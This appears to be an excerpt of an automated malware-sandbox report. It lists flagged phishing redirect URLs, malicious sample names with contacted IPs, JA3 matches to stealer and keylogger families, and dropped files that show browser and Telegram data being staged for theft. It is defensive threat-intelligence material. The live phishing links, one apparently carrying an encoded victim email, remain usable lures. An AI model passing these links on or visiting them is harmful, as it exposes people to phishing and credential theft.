                                                                                                                                                                                                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 104.18.11.207
                                                                                                                                                                                                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                                CLOUDFLARENETUS1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                http://guard-x-tech.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                https://cloud.uibakery.io/share/Z0My4XaLtq/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.67.70.48
                                                                                                                                                                                                                                NoticeOfPayment.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.64.146.81
                                                                                                                                                                                                                                http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50EqGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                http://nkomm.frGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 104.18.11.207
                                                                                                                                                                                                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 104.17.25.14
                                                                                                                                                                                                                                TUT-ASUSVRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                e0691gXIKs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1
                                                                                                                                                                                                                                DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 208.95.112.1

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                6271f898ce5be7dd52b0fc260d0662b3P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                https://delicate-twilight-4fcb7a.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                http://latamavuelospromosco.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                statement.docGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 172.65.251.78
                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eTiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                VRO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                • 149.154.167.220
                                                                                                                                                                                                                                • 104.26.13.205

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\Users\Public\Documents\638724448038426375\Default_LoginDataTemp.db

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\Public\Documents\8.46.123.189_United States_14012025.zip

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):846
                                                                                                                                                                                                                                Entropy (8bit):4.436617663461908
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:5jfqARA2AojXLzZkwAojj3LMAzXAiBAojXLzZk7AojnBOgUk:9ysLxSwZ4UXxBxS7SA
                                                                                                                                                                                                                                MD5:8D19CF5D49647F0543DF9FFF48D7BDDE
                                                                                                                                                                                                                                SHA1:CCB2384635BC8127D9D8B12CE46211766642BFF5
                                                                                                                                                                                                                                SHA-256:D9E54DAD1C6312A83460BE4259B82889A5E2E4BB1381FA4918550A1B0A0FAC0D
                                                                                                                                                                                                                                SHA-512:291E6B872CAF7447A0F5A44F7C872A9545A09237C88C8F854189F7BB1F73E0AC18530BA46074A338885F28DECB72CD63657840BBF9A7D7A2E3AB82394D75CE73
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:PK.........M.Z................638724448038426375/Telegram/PK.........M.Z............*...638724448038426375/Browser/Chrome/Default/PK.........M.Z............(...638724448038426375/Browser/Edge/Default/PK.........M.Z............<...638724448038426375/Browser/Firefox/091tobv5.default-release/PK.........M.Z............4...638724448038426375/Browser/Firefox/dtbqpus9.default/PK...........M.Z..............................638724448038426375/Telegram/PK...........M.Z............*.............:...638724448038426375/Browser/Chrome/Default/PK...........M.Z............(.................638724448038426375/Browser/Edge/Default/PK...........M.Z............<.................638724448038426375/Browser/Firefox/091tobv5.default-release/PK...........M.Z............4............."...638724448038426375/Browser/Firefox/dtbqpus9.default/PK..............t.....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):280
                                                                                                                                                                                                                                Entropy (8bit):4.186405996455797
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:FiWWltlUkzpbazHSAS219jlV/TUqjNlWBVP/Sh/Jzv6cRBAVIGGgphVE7GC/0:o1U6BaYIlWBVsJD6dpPhVeGC/0
                                                                                                                                                                                                                                MD5:FF4B2F80916002BEF10459D054524B3A
                                                                                                                                                                                                                                SHA1:4815BDB42C4FA0F97835C4254467E4029644221A
                                                                                                                                                                                                                                SHA-256:BB303F683F027C962C315298E6983FD975EA4AEBEC7D9212B13C47DC39716831
                                                                                                                                                                                                                                SHA-512:2046AEEA7B5E320729FFB308F899330DFCF328200EB4FBC15B1DCE62538C3AA3B58CE14C70606459990A6809929B4071926BE0C5601536C2DF32CE5796CCF363
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:sdPC....................i...|.@..s..."GTJZX6ysgheZqBTPXcKXA+Ak8runmRph4F61XypBFRM="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8963f191-f8e0-42ec-8449-d20a8242b3e6............

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                                Entropy (8bit):4.387069643302052
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:gWoKSuyADdXakU1dnXR:gY51G1dnB
                                                                                                                                                                                                                                MD5:E26CCB559CD26748D56BEE22D77619A0
                                                                                                                                                                                                                                SHA1:BD5399556D1A42F31695B84FFFDABC6EFCC0437F
                                                                                                                                                                                                                                SHA-256:E96FA1482120DBA77F6D1EF8EC47BC933873FD63BCB0D2F881C560933C87FF74
                                                                                                                                                                                                                                SHA-512:FC36BED914F7E046815F6DF9DD7D6715C07E5F9803CA671816BE4E6E8ACA76D90A51A69442AD23ACB00CBD33DA6050E12C9CAF07A95CD4E6A3E456E1E020B326
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:9440./devtools/browser/1badd4f5-290c-46ed-a515-e2b211712fd6

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp2ff1sv.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmp5hu4vf.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpfwky0w.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\tmpti2rqj.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\example.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF7F50135F80BC9C90.TMP

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):512
